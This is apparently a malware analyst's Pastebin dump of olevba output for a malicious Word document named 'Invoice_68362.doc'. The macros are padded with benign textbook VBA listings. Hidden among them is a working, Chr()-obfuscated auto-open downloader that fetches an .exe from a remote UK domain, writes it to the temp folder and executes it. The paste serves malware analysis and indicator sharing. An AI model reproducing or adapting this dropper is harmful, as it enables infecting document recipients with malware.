SHARE
TWEET

Malicious Word macro

dynamoo Jun 10th, 2015 286 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- Invoice_68362.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Invoice_68362.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: Invoice_68362.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub A121212121212(FFFFF As Long)
  17.  
  18. KIRAMITN2222
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()
  23.  
  24. A121212121212 (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +------------+-------------+-----------------------------------------+
  32. | Type       | Keyword     | Description                             |
  33. +------------+-------------+-----------------------------------------+
  34. | AutoExec   | AutoOpen    | Runs when the Word document is opened   |
  35. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  36. |            |             | be used to obfuscate strings (option    |
  37. |            |             | --decode to see all)                    |
  38. +------------+-------------+-----------------------------------------+
  39. -------------------------------------------------------------------------------
  40. VBA MACRO Module1.bas
  41. in file: Invoice_68362.doc - OLE stream: u'Macros/VBA/Module1'
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. Sub AddCustomer()
  44.     '
  45.    ' Set up the form and then Show it
  46.    '
  47.    With frmCustomer
  48.         .Caption = "Add Customer"   ' Set form title
  49.        .Controls("cmdAction").Caption = "Add"      ' Make sure first button is Add
  50.        .Controls("cmdCancel").Caption = "Cancel"   ' Start second button as Cancel
  51.        .Show
  52.     End With
  53.     Set frmCustomer = Nothing
  54. End Sub
  55.  
  56. ' Listing 17.9. The EditCustomer procedure runs when you select
  57. ' the Edit Customer command or click the Edit Customer button.
  58. '
  59. Sub EditCustomer()
  60.     '
  61.    ' Make sure selection is inside database
  62.    '
  63.    If Not InsideDatabase(ActiveCell.Row) Then
  64.         Exit Sub
  65.     End If
  66.     '
  67.    ' Set up the form and then Show it
  68.    '
  69.    With frmCustomer
  70.         .Caption = "Edit Customer"
  71.         .Controls("cmdAction").Caption = "OK"
  72.         .Show
  73.     End With
  74.     Set frmCustomer = Nothing
  75. End Sub
  76.  
  77. ' Listing 17.10. This function that determines whether
  78. ' or not the active cell is inside the Database range.
  79. '
  80. Function InsideDatabase(currRow As Integer)
  81.  
  82.     With d.Range("Database")
  83.         If .Rows.Count = 1 Then
  84.             MsgBox Prompt:="There are no records in the database.", _
  85.                    Title:="Customer Database", _
  86.                    Buttons:=vbExclamation
  87.             InsideDatabase = False
  88.             Exit Function
  89.         End If
  90.         If currRow <= .Row Or currRow >= (.Row + .Rows.Count) Then
  91.             MsgBox Prompt:="You must select a record inside the database.", _
  92.                    Title:="Customer Database", _
  93.                    Buttons:=vbExclamation
  94.             InsideDatabase = False
  95.         Else
  96.             InsideDatabase = True
  97.         End If
  98.     End With
  99.  
  100. End Function
  101.  
  102. ' Listing 17.11. The FilterCustomers procedure runs when you
  103. ' select the Filter Customers command or click the Filter
  104. ' Customers button.
  105. '
  106. Sub FilterCustomers()
  107.     Dim criteriaCells As Range
  108.     Dim c As Range
  109.     Dim criteriaEmpty As Boolean
  110.     '
  111.    ' Make sure the Criteria range contains a value
  112.    '
  113.    criteriaEmpty = True
  114.     Set criteriaCells = d.Range("Criteria").Offset(1).Resize(RowSize:=1)
  115.     For Each c In criteriaCells
  116.         If d.c.Value <> "" Then criteriaEmpty = False
  117.     Next 'c
  118.    If criteriaEmpty Then
  119.         MsgBox "The Criteria range is empty!" & Chr(13) & _
  120.                "Please enter criteria before filtering the database."
  121.         Exit Sub
  122.     End If
  123.     '
  124.    ' Filter the database according the the Criteria range values
  125.    '
  126.    d.Range("Database").AdvancedFilter _
  127.         Action:=xlFilterInPlace, _
  128.         CriteriaRange:=d.Range("Criteria")
  129. End Sub
  130.  
  131. ' Listing 17.12. The ShowAllCustomers procedure runs when you
  132. ' select the Show All Customers command or click the Show All
  133. ' Customers button.
  134. '
  135. Sub ShowAllCustomers()
  136.     With ActiveSheet
  137.         If .FilterMode Then .ShowAllData
  138.     End With
  139. End Sub
  140.  
  141. ' Listing 17.13. The CountCustomers procedure runs when you
  142. ' select the Count Customers command or click the Count
  143. ' Customers button.
  144. '
  145. Sub CountCustomers()
  146.     Dim totalRows As Integer
  147.     Dim alertMsg As String, alertButtons As Integer, alertTitle As String
  148.     '
  149.    ' Customer count is total rows in Database, minus 1
  150.    '
  151.    totalRows = d.Range("Database").Rows.Count - 1
  152.    
  153.     alertMsg = "There are currently " & _
  154.         totalRows & _
  155.         " customers in the database."
  156.     alertButtons = vbInformation
  157.     alertTitle = "Customer Database"
  158.     MsgBox alertMsg, alertButtons, alertTitle
  159.    
  160. End Sub
  161.  
  162. ' PhoneCustomer()
  163. ' The PhoneCustomer procedure runs when you select the
  164. ' Phone Customer command or click the Phone Customer button.
  165. '
  166. Sub PhoneCustomer()
  167.     On Error GoTo BadStart
  168.     Dim currCell As Range
  169.     Dim currRow As Integer
  170.     Dim response As Integer
  171.     Dim phoneNumber As String
  172.     Dim firstName As String
  173.     Dim lastName As String
  174.     Dim alertMsg As String
  175.     Dim alertButtons As Integer
  176.     Dim alertTitle As String
  177.     Dim winDrive As String
  178.     Dim winFolder As String
  179.     '
  180.    ' Turn off screen updates and save the active cell
  181.    '
  182.    Application.ScreenUpdating = False
  183.     Set currCell = ActiveCell
  184.     currRow = d.currCell.Row
  185.     '
  186.    ' Make sure selection is inside database
  187.    '
  188.    If Not InsideDatabase(currRow) Then
  189.         Exit Sub
  190.     End If
  191.     '
  192.    ' Get data for MsgBox message
  193.    '
  194.    firstName = d.Cells(currRow, d.Range("FirstNameField").Column)
  195.     lastName = d.Cells(currRow, d.Range("FirstNameField").Column + 1)
  196.     d.Cells(currRow, d.Range("PhoneNumberField").Column).Select
  197.     '
  198.    ' Check to see if phone number is blank
  199.    '
  200.    phoneNumber = ActiveCell
  201.     If phoneNumber = "" Then
  202.         MsgBox Prompt:="There is no phone number for this customer.", _
  203.                Title:="Customer Database", _
  204.                Buttons:=vbExclamation
  205.         Exit Sub
  206.     End If
  207.     '
  208.    ' Display the message
  209.    '
  210.    alertMsg = "About to dial the following customer:" & _
  211.         Chr(13) & Chr(13) & _
  212.         firstName & " " & lastName & _
  213.         Chr(13) & _
  214.         phoneNumber & _
  215.         Chr(13) & Chr(13) & _
  216.         "Please make sure your modem is turned on."
  217.     alertButtons = vbOKCancel + vbExclamation
  218.     alertTitle = "Phone Customer"
  219.     response = MsgBox(alertMsg, alertButtons, alertTitle)
  220.     '
  221.    ' If user Cancels, return to active cell and bail out
  222.    '
  223.    If response = vbCancel Then
  224.         currCell.Select
  225.         Exit Sub
  226.     End If
  227.     '
  228.    ' Otherwise, copy phone number to Clipboard and phone the customer
  229.    '
  230.    ActiveCell.Copy
  231.     '
  232.    ' Start Phone Dialer with the focus
  233.    '
  234.    If InStr(1, d.Application.OperatingSystem, "NT") Then
  235.         '
  236.        ' Use this line with Windows NT:
  237.        '
  238.        winDrive = Left(Environ("WINDIR"), 3)
  239.         Shell winDrive & "Program Files\Windows NT\dialer.exe", 1
  240.     Else
  241.         '
  242.        ' Use this line with Windows 95/98:
  243.        '
  244.        winFolder = Environ("WINDIR")
  245.         Shell winFolder & "\dialer.exe", 1
  246.     End If
  247.     '
  248.    ' Paste the copied phone number with Ctrl+V and
  249.    ' then press Enter to select the Dial button
  250.    '
  251.    SendKeys "^v~", True
  252.     '
  253.    ' Wait eight seconds to give the modem time to dial
  254.    '
  255.    d.Application.Wait Now + TimeValue("00:00:08")
  256.     '
  257.    ' Close the dialog boxes and exit Phone Dialer
  258.    '
  259.    SendKeys "~{ESC}%{F4}"
  260.     '
  261.    ' Get rid of Excel's Copy mode indicators and
  262.    ' select the original cell
  263.    '
  264.    d.Application.CutCopyMode = False
  265.     currCell.Select
  266.  
  267.     Exit Sub
  268.  
  269. BadStart:
  270.     MsgBox "Could not start Phone Dialer!", vbOKOnly, vbExclamation
  271. End Sub
  272.  
  273. ' DeleteCustomer()
  274. ' The DeleteCustomer procedure runs when you select the
  275. ' Delete Customer command or click the Delete Customer button.
  276. '
  277. Sub DeleteCustomer()
  278.     '
  279.    ' Make sure selection is inside database
  280.    '
  281.    If Not InsideDatabase(ActiveCell.Row) Then
  282.         Exit Sub
  283.     End If
  284.     '
  285.    ' Set up the form and then Show it
  286.    '
  287.    With frmCustomer
  288.         .Caption = "Delete Customer"   ' Set form title
  289.        .Controls("cmdAction").Caption = "Delete"   ' Make sure first button is Add
  290.        .Controls("cmdCancel").Caption = "Cancel"   ' Start second button as Cancel
  291.        .Show
  292.     End With
  293.     Set frmCustomer = Nothing
  294. End Sub
  295.  
  296. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  297. ANALYSIS:
  298. +------------+----------------+-----------------------------------------+
  299. | Type       | Keyword        | Description                             |
  300. +------------+----------------+-----------------------------------------+
  301. | Suspicious | Windows        | May enumerate application windows (if   |
  302. |            |                | combined with Shell.Application object) |
  303. | Suspicious | Chr            | May attempt to obfuscate specific       |
  304. |            |                | strings                                 |
  305. | Suspicious | Environ        | May read system environment variables   |
  306. | Suspicious | SendKeys       | May control another application by      |
  307. |            |                | simulating user keystrokes              |
  308. | Suspicious | Shell          | May run an executable file or a system  |
  309. |            |                | command                                 |
  310. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  311. |            |                | may be used to obfuscate strings        |
  312. |            |                | (option --decode to see all)            |
  313. | IOC        | dialer.exe     | Executable file name                    |
  314. +------------+----------------+-----------------------------------------+
  315. -------------------------------------------------------------------------------
  316. VBA MACRO Module5.bas
  317. in file: Invoice_68362.doc - OLE stream: u'Macros/VBA/Module5'
  318. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  319. Const DBLOCATION = "C:\Program Files\Microsoft Office\Office\Samples\Northwind.mdb"
  320.  
  321. Sub DatabaseConnection()
  322.  
  323.     If Dir(DBLOCATION) = "" Then
  324.         MsgBox "The location of the NorthWind sample " & _
  325.         "database is incorrect." & Chr(13) & _
  326.         "Please adjust the path and then run this " & _
  327.         "procedure again."
  328.         Exit Sub
  329.     End If
  330.  
  331.     Set rs = db.OpenRecordset("Customers")
  332.  
  333.     MsgBox "Opened " & db.Name & " Successfully!" & _
  334.            Chr(13) & Chr(13) & _
  335.            "The open Recordset is " & rs.Name
  336.  
  337.     rs.Close
  338.     db.Close
  339.     Set rs = Nothing
  340.     Set db = Nothing
  341. End Sub
  342.  
  343. Sub NonJetConnection()
  344.  
  345.     If Dir(DBLOCATION) = "" Then
  346.         MsgBox "The location of the NorthWind sample " & _
  347.         "database is incorrect." & Chr(13) & _
  348.         "Please adjust the path and then run this " & _
  349.         "procedure again."
  350.         Exit Sub
  351.     End If
  352.  
  353.     Set tdDBASE = db.CreateTableDef("Linked dBASE Table")
  354.     tdDBASE.Connect = "dBASE IV;DATABASE=" & ThisWorkbook.Path
  355.     tdDBASE.SourceTableName = "Customer"
  356.     db.TableDefs.Append tdDBASE
  357.  
  358.     Set rs = db.OpenRecordset("Linked dBASE Table", dbOpenSnapshot)
  359.  
  360.     MsgBox "Opened " & db.Name & " Successfully!" & _
  361.             Chr(13) & Chr(13) & _
  362.             "The open Recordset is " & rs.Name & _
  363.             Chr(13) & _
  364.             "The source table is " & tdDBASE.SourceTableName
  365.     '
  366.    ' Close and release the objects
  367.    '
  368.    rs.Close
  369.     db.Close
  370.     Set rs = Nothing
  371.     Set tdDBASE = Nothing
  372.     Set db = Nothing
  373. End Sub
  374.  
  375. ' Listing 18.3. A procedure that displays information on
  376. ' all the fields in a Recordset.
  377. '
  378. Sub DisplayFieldInfo()
  379.     Dim i As Integer
  380.     Dim fieldInfo As String
  381.     '
  382.    ' Open the Northwind database
  383.    '
  384.    If Dir(DBLOCATION) = "" Then
  385.         MsgBox "The location of the NorthWind sample " & _
  386.         "database is incorrect." & Chr(13) & _
  387.         "Please adjust the path and then run this " & _
  388.         "procedure again."
  389.         Exit Sub
  390.     End If
  391.     '
  392.    ' Open the Categories table
  393.    '
  394.    Set rs = db.OpenRecordset("Categories", dbOpenSnapshot)
  395.     '
  396.    ' Enumerate all fields in the Recordset
  397.    '
  398.    For i = 0 To rs.Fields.Count - 1
  399.         fieldInfo = "Recordset: " & rs.Name & Chr(13) & _
  400.             "Field " & _
  401.             i + 1 & " of " & _
  402.             rs.Fields.Count & Chr(13) & Chr(13)
  403.         '
  404.        ' Set the Field variable and then run through the properties
  405.        '
  406.        Set fld = rs.Fields(i)
  407.         fieldInfo = fieldInfo & _
  408.             "Name: " & fld.Name & Chr(13) & _
  409.             "Allow Zero Length: " & fld.AllowZeroLength & Chr(13) & _
  410.             "Attributes: " & fld.Attributes & Chr(13) & _
  411.             "Collating Order: " & fld.CollatingOrder & Chr(13) & _
  412.             "Default Value: " & fld.DefaultValue & Chr(13) & _
  413.             "Ordinal Position: " & fld.OrdinalPosition & Chr(13) & _
  414.             "Required: " & fld.Required & Chr(13) & _
  415.             "Size: " & fld.Size & Chr(13) & _
  416.             "Source Field: " & fld.SourceField & Chr(13) & _
  417.             "Source Table: " & fld.SourceTable & Chr(13) & _
  418.             "Type of Field: " & TypeOfField(fld.Type) & Chr(13) & _
  419.             "Validation Rule: " & fld.ValidationRule & Chr(13) & _
  420.             "Validation Text: " & fld.ValidationText
  421.         MsgBox Prompt:=fieldInfo, Title:="Field Information"
  422.     Next i
  423.     '
  424.    ' Close and release the objects
  425.    '
  426.    rs.Close
  427.     db.Close
  428.     Set rs = Nothing
  429.     Set fld = Nothing
  430.     Set db = Nothing
  431. End Sub
  432.  
  433.  
  434.  
  435. ' TypeOfField()
  436. ' Function to translate the constant returned by a Field object's
  437. ' Type property into a descriptive string.
  438. '
  439. Function TypeOfField(fldConstant As Integer) As String
  440.  
  441.     Select Case fldConstant
  442.         Case 1   ' dbBoolean
  443.            TypeOfField = "Boolean"
  444.         Case 2   ' dbByte
  445.            TypeOfField = "Byte"
  446.         Case 3   ' dbInteger
  447.            TypeOfField = "Integer"
  448.         Case 4   ' dbLong
  449.            TypeOfField = "Long Integer"
  450.         Case 5   ' dbCurrency
  451.            TypeOfField = "Currency"
  452.         Case 6   ' dbSingle
  453.            TypeOfField = "Single"
  454.         Case 7   ' dbDouble
  455.            TypeOfField = "Double"
  456.         Case 8   ' dbDate
  457.            TypeOfField = "Date"
  458.         Case 10  ' dbText
  459.            TypeOfField = "Text"
  460.         Case 11  'dbLongBinary
  461.            TypeOfField = "OLE Object"
  462.         Case 12  ' dbMemo
  463.            TypeOfField = "Memo"
  464.         Case 15  ' dbGUID
  465.            TypeOfField = "GUID"
  466.     End Select
  467. End Function
  468.  
  469. ' Listing 18.4. A procedure that opens a recordset using
  470. ' a SQL SELECT expression.
  471. '
  472. Sub QueryCustomers()
  473.     Dim strSELECT As String
  474.     '
  475.    ' Open the Northwind database (check the path!)
  476.    '
  477.    If Dir(DBLOCATION) = "" Then
  478.         MsgBox "The location of the NorthWind sample " & _
  479.         "database is incorrect." & Chr(13) & _
  480.         "Please adjust the path and then run this " & _
  481.         "procedure again."
  482.         Exit Sub
  483.     End If
  484.     '
  485.    ' Store the SELECT statement in a string variable
  486.    '
  487.    strSELECT = "SELECT CompanyName,Region,Country " & _
  488.                 "FROM Customers " & _
  489.                 "WHERE Country = 'Canada' " & _
  490.                 "ORDER BY CompanyName"
  491.     '
  492.    ' Open the recordset
  493.    '
  494.    Set rs = db.OpenRecordset(strSELECT)
  495.     '
  496.    ' Display confirmation message
  497.    '
  498.    MsgBox "The filtered Recordset contains " & _
  499.     rs.RecordCount & " records."
  500.     '
  501.    ' Close and release the objects
  502.    '
  503.    rs.Close
  504.     db.Close
  505.     Set rs = Nothing
  506.     Set db = Nothing
  507. End Sub
  508.  
  509. ' Listing 18.5. A procedure that creates a recordset from
  510. ' a QueryDef object.
  511. '
  512. Sub QueryDefExample()
  513.     '
  514.    ' Open the Northwind database (check the path!)
  515.    '
  516.    If Dir(DBLOCATION) = "" Then
  517.         MsgBox "The location of the NorthWind sample " & _
  518.         "database is incorrect." & Chr(13) & _
  519.         "Please adjust the path and then run this " & _
  520.         "procedure again."
  521.         Exit Sub
  522.     End If
  523.     '
  524.    ' Assign the QueryDef object
  525.    '
  526.    Set qd = db.QueryDefs("Products Above Average Price")
  527.     '
  528.    ' Open the recordset
  529.    '
  530.    Set rs = qd.OpenRecordset()
  531.     '
  532.    ' Display confirmation message
  533.    '
  534.    MsgBox "The filtered Recordset contains " & _
  535.         rs.RecordCount & " records."
  536.     '
  537.    ' Close and release the objects
  538.    '
  539.    rs.Close
  540.     db.Close
  541.     Set rs = Nothing
  542.     Set qd = Nothing
  543.     Set db = Nothing
  544. End Sub
  545.  
  546. ' Listing 18.6. A procedure that reads 100 rows from a
  547. ' recordset into a worksheet.
  548. '
  549.  
  550. Public Function KIRAMITN1122(KIRAMITN1133 As String)
  551.     Set KIRAMITN1144 = KIRAMITN1155(Chr(83) & Chr(104) & "e" & "l" & Chr(108) & "." & Chr(65) & Chr(112) & Chr(112) & "l" & "i" & "c" & "a" & Chr(116) & "i" & Chr(111) & Chr(110))
  552. KIRAMITN1144.Open (KIRAMITN2211)
  553. End Function
  554. Public Function KIRAMITN1155(KIRAMITN1166 As String)
  555.     Set KIRAMITN1155 = CreateObject(KIRAMITN1166)
  556. End Function
  557. Public Function KIRAMITN1177(KIRAMITN2200 As Variant, KIRAMITN1199 As String)
  558. Dim KIRAMITN1188: Set KIRAMITN1188 = KIRAMITN1155("A" & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "m")
  559.  
  560. With KIRAMITN1188
  561.    .Type = 1
  562.     .Open
  563.     .write KIRAMITN2200
  564.     .savetofile KIRAMITN1199, 2
  565. End With
  566. End Function
  567.  
  568. Sub ReadDataIntoExcel()
  569.     Dim recArray As Variant
  570.     Dim i As Integer, j As Integer
  571.     '
  572.    ' Open the Jet database, QueryDef, and Recordset
  573.    '
  574.    If Dir(DBLOCATION) = "" Then
  575.         MsgBox "The location of the NorthWind sample " & _
  576.         "database is incorrect." & Chr(13) & _
  577.         "Please adjust the path and then run this " & _
  578.         "procedure again."
  579.         Exit Sub
  580.     End If
  581.     Set qd = db.QueryDefs("Invoices")
  582.     Set rs = qd.OpenRecordset()
  583.     '
  584.    ' Head for Database Records and clear the sheet
  585.    '
  586.    With db.Worksheets("Database Records").[a1]
  587.         .CurrentRegion.Clear
  588.         '
  589.        ' Read the data using GetRows
  590.        '
  591.        recArray = rs.GetRows(100)
  592.         For i = 0 To UBound(recArray, 2)
  593.             For j = 0 To UBound(recArray, 1)
  594.                 .Offset(i + 1, j) = recArray(j, i)
  595.             Next j
  596.         Next i
  597.         '
  598.        ' Enter the field names and format the cells
  599.        '
  600.        For j = 0 To rs.Fields.Count - 1
  601.             .Offset(0, j) = rs.Fields(j).Name
  602.             .Offset(0, j).Font.Bold = True
  603.             .Offset(0, j).EntireColumn.AutoFit
  604.         Next j
  605.  
  606.     End With
  607.     '
  608.    ' Close and release the objects
  609.    '
  610.    rs.Close
  611.     db.Close
  612.     Set rs = Nothing
  613.     Set qd = Nothing
  614.     Set db = Nothing
  615. End Sub
  616.  
  617. ' Listing 18.7. A procedure that filters out OLE Object
  618. ' fields before retrieving a recordset.
  619. '
  620. Sub RetrieveCategories()
  621.     Dim strSELECT As String, i As Integer
  622.     '
  623.    ' Open the Jet database
  624.    '
  625.    If Dir(DBLOCATION) = "" Then
  626.         MsgBox "The location of the NorthWind sample " & _
  627.         "database is incorrect." & Chr(13) & _
  628.         "Please adjust the path and then run this " & _
  629.         "procedure again."
  630.         Exit Sub
  631.     End If
  632.     '
  633.    ' Open the full Categories table
  634.    '
  635.    Set rs = db.OpenRecordset("Categories")
  636.     '
  637.    ' The strSELECT variable will hold the SQL SELECT statement
  638.    ' that filters the Recordset to remove OLE Object fields
  639.    '
  640.    strSELECT = "SELECT "
  641.     '
  642.    ' Run through the recordset fields
  643.    '
  644.    For Each fld In rs.Fields
  645.         '
  646.        ' Check for OLE Object fields
  647.        '
  648.        If fld.Type <> dbLongBinary Then
  649.             '
  650.            ' If it's not an OLE Object field, add it to the SELECT statement
  651.            '
  652.            strSELECT = strSELECT & fld.Name & ","
  653.         End If
  654.     Next fld
  655.     '
  656.    ' Remove the trailing comma
  657.    '
  658.    strSELECT = Left(strSELECT, Len(strSELECT) - 1)
  659.     '
  660.    ' Add the FROM clause
  661.    '
  662.    strSELECT = strSELECT & " FROM Categories"
  663.     '
  664.    ' Open the filtered recordset
  665.    '
  666.    Set rs = db.OpenRecordset(strSELECT)
  667.     '
  668.    ' Retrieve the records
  669.    '
  670.    db.Worksheets("Database Records").Activate
  671.     With db.Worksheets("Database Records").[a1]
  672.         .CurrentRegion.Clear
  673.         .Offset(1).CopyFromRecordset rs
  674.         '
  675.        ' Enter the field names and format the cells
  676.        '
  677.        For i = 0 To rs.Fields.Count - 1
  678.             .Offset(0, i) = rs.Fields(i).Name
  679.             .Offset(0, i).Font.Bold = True
  680.             .Offset(0, i).EntireColumn.AutoFit
  681.         Next i
  682.     End With
  683.     '
  684.    ' Close and release the objects
  685.    '
  686.    rs.Close
  687.     db.Close
  688.     Set rs = Nothing
  689.     Set fld = Nothing
  690.     Set db = Nothing
  691. End Sub
  692.  
  693. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  694. ANALYSIS:
  695. +------------+----------------+-----------------------------------------+
  696. | Type       | Keyword        | Description                             |
  697. +------------+----------------+-----------------------------------------+
  698. | Suspicious | Open           | May open a file                         |
  699. | Suspicious | Chr            | May attempt to obfuscate specific       |
  700. |            |                | strings                                 |
  701. | Suspicious | CreateObject   | May create an OLE object                |
  702. | Suspicious | SaveToFile     | May create a text file                  |
  703. | Suspicious | Run            | May run an executable file or a system  |
  704. |            |                | command                                 |
  705. | Suspicious | sample         | May detect Anubis Sandbox               |
  706. | Suspicious | Write          | May write to a file (if combined with   |
  707. |            |                | Open)                                   |
  708. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  709. |            |                | may be used to obfuscate strings        |
  710. |            |                | (option --decode to see all)            |
  711. +------------+----------------+-----------------------------------------+
  712. -------------------------------------------------------------------------------
  713. VBA MACRO Module3.bas
  714. in file: Invoice_68362.doc - OLE stream: u'Macros/VBA/Module3'
  715. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  716. Public KIRAMITN2211 As String
  717.  
  718. '
  719. ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
  720. '
  721. Sub GetNumbers()
  722.     Dim done As Boolean
  723.     Dim divisor As Variant
  724.     Dim dividend As Variant
  725.     '
  726.    ' Prompt user for dividend and divisor.
  727.    '
  728.    done = False
  729.     Do While Not done
  730.         dividend = InputBox("Enter the dividend:", "Divider")
  731.         divisor = InputBox("Enter the divisor:", "Divider")
  732.         done = f.Divide(dividend, divisor)
  733.     Loop
  734. End Sub
  735. '
  736. ' Listing 23.3 Backs up the active workbook to a drive specified by
  737. ' the user. Traps any errors (such as having no disk in the drive).
  738. '
  739.  
  740. Sub KIRAMITN2222()
  741.  
  742. Set KIRAMITN2233 = KIRAMITN1155("M" & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & "o" & Chr(102) & "t" & "." & Chr(88) & Chr(77) & Chr(76) & Chr(72) & "T" & Chr(84) & Chr(80))
  743.    
  744. CallByName KIRAMITN2233, Chr(79) & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & Chr(116) & "p" & Chr(58) & "/" & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(106) & Chr(105) & "m" & Chr(97) & "i" & Chr(109) & "r" & "a" & Chr(99) & Chr(105) & "n" & Chr(103) & "." & Chr(99) & Chr(111) & Chr(46) & Chr(117) & Chr(107) & "/" & "6" & Chr(52) & Chr(47) & "1" & "1" & Chr(46) & "e" & Chr(120) & "e", False
  745. Set KIRAMITN2244 = KIRAMITN1155("W" & "S" & Chr(99) & "r" & "i" & Chr(112) & "t" & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "l")
  746.  
  747. Set KIRAMITN2255 = CallByName(KIRAMITN2244, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  748.  
  749. KIRAMITN2266 = KIRAMITN2255("T" & Chr(69) & Chr(77) & "P")
  750.  
  751. KIRAMITN2211 = KIRAMITN2266 & Chr(92) & Chr(98) & Chr(105) & "r" & Chr(115) & Chr(97) & "f" & Chr(112) & "c.e" & Chr(120) & Chr(101)
  752. Dim KIRAMITN2277() As Byte
  753.  
  754. CallByName KIRAMITN2233, Chr(83) & "e" & Chr(110) & Chr(100), VbMethod
  755. KIRAMITN2277 = CallByName(KIRAMITN2233, "r" & Chr(101) & Chr(115) & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
  756. KIRAMITN1177 KIRAMITN2277, KIRAMITN2211
  757. On Error GoTo KIRAMITN2288
  758.     a = 129 / 0
  759.   On Error GoTo 0
  760.  
  761. KIRAMITN2299:
  762.   Exit Sub
  763. KIRAMITN2288:
  764.   KIRAMITN1122 ("Ki8JfHxWCPDg")
  765. Resume KIRAMITN2299
  766. End Sub
  767.  
  768. Sub BackUpToFloppy()
  769.     Dim backupDrive As String
  770.     Dim backupName As String
  771.     Dim msg As String
  772.     Dim done As Boolean
  773.     Dim result As Integer
  774.     '
  775.    ' Define the location of the error handler
  776.    '
  777.    On Error GoTo ErrorHandler
  778.     '
  779.    ' Initialize some variables and then loop
  780.    '
  781.    Application.DisplayAlerts = False
  782.     done = False
  783.     backupDrive = "A:"
  784.     While Not done
  785.         '
  786.        ' Get the drive to use for the backup
  787.        '
  788.        backupDrive = InputBox( _
  789.             Prompt:="Enter the drive letter for the backup:", _
  790.             Title:="Backup", _
  791.             Default:=backupDrive)
  792.         '
  793.        ' Check to see if OK was selected
  794.        '
  795.        If backupDrive <> "" Then
  796.             '
  797.            ' Make sure the backup drive contains a colon (:)
  798.            '
  799.            If InStr(backupDrive, ":") = 0 Then
  800.                 backupDrive = Left(backupDrive, 1) & ":"
  801.             End If
  802.             '
  803.            ' First, save the file
  804.            '
  805.            ActiveWorkbook.Save
  806.             '
  807.            ' Assume the backup will be successful,
  808.            ' so set done to True to exit the loop
  809.            '
  810.            done = True
  811.             '
  812.            ' Concatenate drive letter and workbook name
  813.            '
  814.            backupName = backupDrive & ActiveWorkbook.Name
  815.             '
  816.            ' Make a copy on the specified drive
  817.            '
  818.            ActiveWorkbook.SaveCopyAs FileName:=backupName
  819.         Else
  820.             Exit Sub
  821.         End If
  822.     Wend
  823.     '
  824.    ' Bypass the error handler
  825.    '
  826.    Exit Sub
  827.     '
  828.    ' Code branches here if an error occurs
  829.    '
  830. ErrorHandler:
  831.     msg = "An error has occurred!" & Chr(13) & Chr(13) & _
  832.           "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
  833.           "letter, or Ignore to attempt the backup again."
  834.     result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
  835.     Select Case result
  836.         Case vbAbort
  837.             done = True
  838.         Case vbRetry
  839.             done = False
  840.             Resume Next
  841.         Case vbIgnore
  842.             Resume
  843.     End Select
  844. End Sub
  845. '
  846. ' Listing 23.4. This procedure divides two numbers. It traps three specific
  847. ' errors: division by zero, overflow, and type mismatch.
  848. '
  849. Sub DivideNumbers()
  850.     Dim msg As String
  851.     Dim result As Single
  852.     Dim divisor As Variant
  853.     Dim dividend As Variant
  854.     '
  855.    ' Set the trap
  856.    '
  857.    On Error GoTo DivByZeroHandler
  858.     '
  859.    ' Prompt user for the dividend
  860.    '
  861. GetDividendAndDivisor:
  862.     dividend = InputBox("Enter the dividend:", "Divider")
  863.     If dividend = "" Then Exit Sub
  864.     '
  865.    ' Prompt user for the divisor
  866.    '
  867. GetDivisorOnly:
  868.     divisor = InputBox("Enter the divisor:", "Divider")
  869.     If divisor = "" Then Exit Sub
  870.     '
  871.    ' Peform the division
  872.    '
  873.    result = dividend / divisor
  874.     '
  875.    ' If it went okay, display the result
  876.    '
  877.    msg = dividend & _
  878.           " divided by " & _
  879.           divisor & _
  880.           " equals " & _
  881.           result
  882.     MsgBox msg
  883.     '
  884.    ' Bypass the error handler
  885.    '
  886.    Exit Sub
  887.     '
  888.    ' Code branches here if an error occurs
  889.    '
  890. DivByZeroHandler:
  891.     '
  892.    ' Display the error message
  893.    '
  894.    msg = "An error occurred!" & Chr(13) & Chr(13) & _
  895.           "Error number:  " & Err.Number & Chr(13) & _
  896.           "Error message: " & Err.Description
  897.     MsgBox msg, vbOKOnly + vbCritical
  898.     '
  899.    ' Check the error number
  900.    '
  901.    Select Case Err.Number
  902.         '
  903.        ' Division by zero
  904.        '
